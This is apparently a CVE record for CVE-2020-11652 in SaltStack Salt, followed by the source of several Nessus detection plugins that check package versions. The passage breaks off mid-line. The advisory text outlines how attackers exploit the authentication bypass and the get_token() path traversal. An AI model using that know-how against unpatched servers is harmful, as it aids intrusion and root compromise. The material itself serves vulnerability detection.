ID CVE-2020-11652 Type cve Reporter cve@mitre.org Modified 2020-05-28T18:15:00
Description
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
{"nessus": [{"lastseen": "2020-05-21T16:52:19", "bulletinFamily": "scanner", "description": "An update of the salt3 package has been released.", "modified": "2020-05-18T00:00:00", "id": "PHOTONOS_PHSA-2020-1_0-0294_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/136695", "published": "2020-05-18T00:00:00", "title": "Photon OS 1.0: Salt3 PHSA-2020-1.0-0294", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-1.0-0294. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136695);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/19\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n\n script_name(english:\"Photon OS 1.0: Salt3 PHSA-2020-1.0-0294\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-294.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-api-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-cloud-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-master-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-minion-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-proxy-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-spm-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-ssh-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-syndic-2019.2.4-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T20:40:21", "bulletinFamily": "scanner", "description": "According to its self-reported version number, the instance of SaltStack hosted on the remote server is prior to\n2019.2.4, 3000.x prior to 3000.2. It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerabilities exists in the ClearFuncs class due to improper validation of\n method calls. An unauthenticated, remote attacker can exploit this by accessing exposed methods to trigger\n minions to run arbitrary commands as root, or to retrieve the root key to authenticate commands from the\n local root user on the master server. (CVE-2020-11651)\n\n - A directory traversal vulnerabilities exists in the ClearFuncs class due to improper path sanitization. An\n authenticated, remote attacker can exploit this by accessing the exposed get_token() method which allows\n the insertion of double periods in the filename parameter to read files outside of the intended directory.\n The only restriction is that the file has to be deserializable by salt.payload.Serial.loads().\n (CVE-2020-11652)", "modified": "2020-05-07T00:00:00", "id": "SALTSTACK_3000_2_MULTIPLE_VULNERABILITIES.NASL", "href": "https://www.tenable.com/plugins/nessus/136402", "published": "2020-05-07T00:00:00", "title": "SaltStack < 2019.2.4 / 3000.x < 3000.2 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136402);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/13\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"EDB-ID\", value:\"48421\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195\");\n\n script_name(english:\"SaltStack < 2019.2.4 / 3000.x < 3000.2 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of SaltStack running on the remote server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of SaltStack hosted on the remote server is prior to\n2019.2.4, 3000.x prior to 3000.2. It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerabilities exists in the ClearFuncs class due to improper validation of\n method calls. An unauthenticated, remote attacker can exploit this by accessing exposed methods to trigger\n minions to run arbitrary commands as root, or to retrieve the root key to authenticate commands from the\n local root user on the master server. (CVE-2020-11651)\n\n - A directory traversal vulnerabilities exists in the ClearFuncs class due to improper path sanitization. An\n authenticated, remote attacker can exploit this by accessing the exposed get_token() method which allows\n the insertion of double periods in the filename parameter to read files outside of the intended directory.\n The only restriction is that the file has to be deserializable by salt.payload.Serial.loads().\n (CVE-2020-11652)\");\n # https://labs.f-secure.com/advisories/saltstack-authorization-bypass\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4df67f57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to SaltStack version 2019.2.4, 3000.2 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:saltstack:salt\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"saltstack_salt_linux_installed.nbin\");\n script_require_keys(\"installed_sw/SaltStack Salt Master\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'SaltStack Salt Master');\n\nconstraints = [\n { 'fixed_version' : '2019.2.0', 'fixed_display' : '2019.2.4, 3000.2 or later.' },\n { 'min_version' : '2019.2.0', 'fixed_version' : '2019.2.4' },\n { 'min_version' : '3000.0', 'fixed_version' : '3000.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-21T16:52:33", "bulletinFamily": "scanner", "description": "An update of the salt3 package has been released.", "modified": "2020-05-18T00:00:00", "id": "PHOTONOS_PHSA-2020-3_0-0091_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/136699", "published": "2020-05-18T00:00:00", "title": "Photon OS 3.0: Salt3 PHSA-2020-3.0-0091", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-3.0-0091. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136699);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/19\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n\n script_name(english:\"Photon OS 3.0: Salt3 PHSA-2020-3.0-0091\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-91.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 3.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-api-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-cloud-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-master-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-minion-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-proxy-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-spm-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-ssh-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-syndic-2019.2.4-1.ph3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-21T16:52:19", "bulletinFamily": "scanner", "description": "An update of the salt package has been released.", "modified": "2020-05-18T00:00:00", "id": "PHOTONOS_PHSA-2020-1_0-0294_SALT.NASL", "href": "https://www.tenable.com/plugins/nessus/136694", "published": "2020-05-18T00:00:00", "title": "Photon OS 1.0: Salt PHSA-2020-1.0-0294", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-1.0-0294. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136694);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/19\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n\n script_name(english:\"Photon OS 1.0: Salt PHSA-2020-1.0-0294\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-294.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-api-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-cloud-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-master-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-minion-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-proxy-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-spm-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-ssh-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-syndic-2019.2.4-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T21:13:10", "bulletinFamily": "scanner", "description": "This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-04-30T00:00:00", "id": "SUSE_SU-2020-1151-1.NASL", "href": "https://www.tenable.com/plugins/nessus/136170", "published": "2020-04-30T00:00:00", "title": "SUSE SLES15 Security Update : salt (SUSE-SU-2020:1151-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1151-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136170);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/13\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195\");\n\n script_name(english:\"SUSE SLES15 Security Update : salt (SUSE-SU-2020:1151-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11651/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11652/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201151-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6df3c979\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-1151=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-1151=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1151=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1151=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python2-salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python3-salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-api-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-cloud-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-doc-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-master-2019.2.0-5.67.1\")) flag++;\nif 